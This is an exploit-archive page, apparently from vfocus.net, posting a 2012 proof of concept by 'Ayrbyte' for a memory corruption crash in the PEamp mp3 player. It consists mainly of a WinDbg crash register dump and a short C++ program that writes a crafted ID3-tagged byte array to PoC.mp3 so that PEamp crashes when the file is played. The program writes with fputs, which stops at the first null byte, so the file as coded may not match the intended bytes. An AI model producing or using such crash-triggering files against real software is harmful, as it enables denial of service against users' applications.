|
PEamp (.mp3) Memmory Corruption PoC
|
|
来源:vfocus.net 作者:Ayrbyte 发布时间:2012-06-11
|
|
/*Title: PEamp (.mp3) Memmory Corruption PoC
Author: Ayrbyte
Link: http:www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml
Versi: v1.02b
Tested on: Windows 7
Fb: facebook.com/Ayrbyte
Greetz To : all CREMY Family, and for all indonesian indonesian h4x0r
?? %% %% $$$$$ >> > :: ;;;;;;;;
?? ? %% %% $$ $$ || >> > :: ;; ;;
????? %%%% $$$$$ ||___ >>> ::::: ;;;;;;;
?? ?? %% $$$$ || || > :: ;;
%%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
______________>>Ayrbyte<<_______________
Gamerz From CREMY | CRazy Experience arMY
[bug]
eax=00040446 ebx=00000000 ecx=7324945c edx=00000000 esi=00040446 edi=00040446
eip=7322428e esp=0012fc4c ebp=0012fc4c iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\WINMM.dll -
WINMM!DriverCallback+0x7bf:
7322428e 8b40d4 mov eax,dword ptr [eax-2Ch] ds:0023:0004041a=???????? <--CRASH
*/
//[Poc :]
#include <iostream>
using namespace std;
//Add and Play PoC.mp3 to PEamp then you will see MCI Error Message Box when you klik ok or close this MessageBox
//program will be CRASH
char _isi[] =
"\x49\x44\x33\x03\x00\x00\x00\x21\x76\x43\x4F\x4D\x4D\x00\x00\x00"
"\x00\x22\x00\x00\x00\x65\x6E\x67\x00\x4D\x41\x44\x45\x20\x42\x59"
"\x20\x3A\x20\x53\x20\x41\x20\x50\x20\x49\x20\x50\x72\x6F\x64\x75"
"\x63\x74\x69\x6F\x6E\x73\x54\x52\x43\x4B\x00\x00\x00\x02\x00\x00"
"\x00\x36\x54\x43\x4F\x4E\x00\x00\x00\x05\x00\x00\x00\x28\x31\x37"
"\x29\x54\x41\x4C\x42\x00\x00\x00\x0D\x00\x00\x00\x43\x49\x54\x59"
"\x20\x4F\x46\x20\x45\x56\x49\x4C\x54\x49\x54\x32\x00\x00\x00\x11"
"\x00\x00\x00\x30\x36\x20\x53\x65\x69\x7A\x65\x20\x54\x68\x65\x20"
"\x44\x61\x79\x50\x52\x49\x56\x00\x00\x00\x27\x00\x00\x57\x4D\x2F"
"\x4D\x65\x64\x69\x61\x43\x6C\x61\x73\x73\x50\x72\x69\x6D\x61\x72"
"\x79\x49\x44\x00\xBC\x7D\x60\xD1\x23\xE3\xE2\x4B\x86\xA1\x48\xA4"
"\x2A\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\x29\x00\x00\x57\x4D"
"\x2F\x4D\x65\x64\x69\x61\x43\x6C\x61\x73\x73\x53\x65\x63\x6F\x6E"
"\x64\x61\x72\x79\x49\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x54\x50\x45\x31\x00\x00\x00\x12\x00"
"\x00\x00\x41\x56\x45\x4E\x47\x45\x44\x20\x53\x45\x56\x45\x4E\x46"
"\x4F\x4C\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xFF\xFB\x92\x44\xFF\x80\x0B\xF0\x00\x4B\x80\x00\x00"
"\x08\x00\x00\x09\x70\x00\x00\x01\x00\x00\x01\x2E\x00\x00\x00\x20"
"\x00\x00\x25\xC0\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x54\x41\x47\x30\x36\x20\x53\x65\x69\x7A\x65"
"\x20\x54\x68\x65\x20\x44\x61\x79\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x41\x56\x45\x4E\x47\x45\x44\x20\x53\x45"
"\x56\x45\x4E\x46\x4F\x4C\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x43\x49\x54\x59\x20\x4F\x46\x20\x45\x56\x49\x4C"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x4D\x41\x44\x45\x20\x42\x59\x20\x3A\x20"
"\x53\x20\x41\x20\x50\x20\x49\x20\x50\x72\x6F\x64\x75\x63\x74\x69"
"\x6F\x6E\x00\x06\x11";
int main(){
FILE *_file;
#define _namefile "PoC.mp3"
_file = fopen(_namefile, "w");
fputs(_isi, _file);
fclose(_file);
return 0;
}
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
